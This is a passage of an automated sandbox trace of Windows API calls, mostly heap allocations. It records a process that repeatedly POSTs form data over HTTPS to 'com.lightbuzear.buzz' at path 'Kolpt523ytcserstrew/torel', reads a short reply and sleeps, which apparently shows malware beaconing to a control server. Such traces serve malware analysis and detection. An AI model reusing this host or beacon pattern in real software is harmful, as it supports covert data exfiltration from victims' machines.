0x47ce5a0 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb08 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb38 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0220.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb08 [0220.681] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d90 [0220.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d90 | out: hHeap=0x4780000) returned 1 [0220.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0220.682] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0220.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0220.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0220.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0220.682] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0220.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0220.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0220.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0220.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0220.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0220.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed48 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830b60 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b60 | out: hHeap=0x4780000) returned 1 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d90 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0220.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ae8 [0220.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0220.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0220.853] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0220.853] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0220.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ae8 | out: hHeap=0x4780000) returned 1 [0220.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0220.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0220.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830db8 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0220.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ae8 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0220.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b60 [0220.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0220.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0220.946] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0220.946] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0222.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b60 | out: hHeap=0x4780000) returned 1 [0222.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0222.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0222.225] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0222.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0222.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0222.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0222.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0222.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b48 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed48 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830b60 [0222.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0222.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0222.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b60 | out: hHeap=0x4780000) returned 1 [0222.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b60 [0222.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0222.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0222.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0222.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0222.228] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0222.228] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0222.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0222.229] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0222.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0222.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0222.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0222.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e80 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0222.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c50 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0222.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0222.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0222.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0222.236] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0222.236] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0222.236] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0222.236] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0222.237] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0222.237] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0222.237] FreeLibrary (hLibModule=0x71570000) returned 1 [0222.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0222.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0222.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0222.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0222.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a98 | out: hHeap=0x4780000) returned 1 [0222.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c28 | out: hHeap=0x4780000) returned 1 [0222.239] Sleep (dwMilliseconds=0x2710) [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0222.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb38 [0222.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0222.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0222.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0222.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0222.284] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0222.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb68 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb68 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830cf0 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0222.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d68 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0222.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0222.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0222.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0222.287] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0222.287] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0222.287] FreeLibrary (hLibModule=0x71780000) returned 1 [0222.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0222.287] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0222.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c28 [0222.287] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb68 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb68 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0222.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb68 [0222.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0222.289] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0222.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0222.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0222.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0222.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed48 [0222.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0222.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0222.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0222.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed48 [0222.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0222.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0222.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0222.290] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0222.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0222.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0222.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0222.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0222.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0222.291] RtlAllocateHeap (HeapHandle=0x4780000, 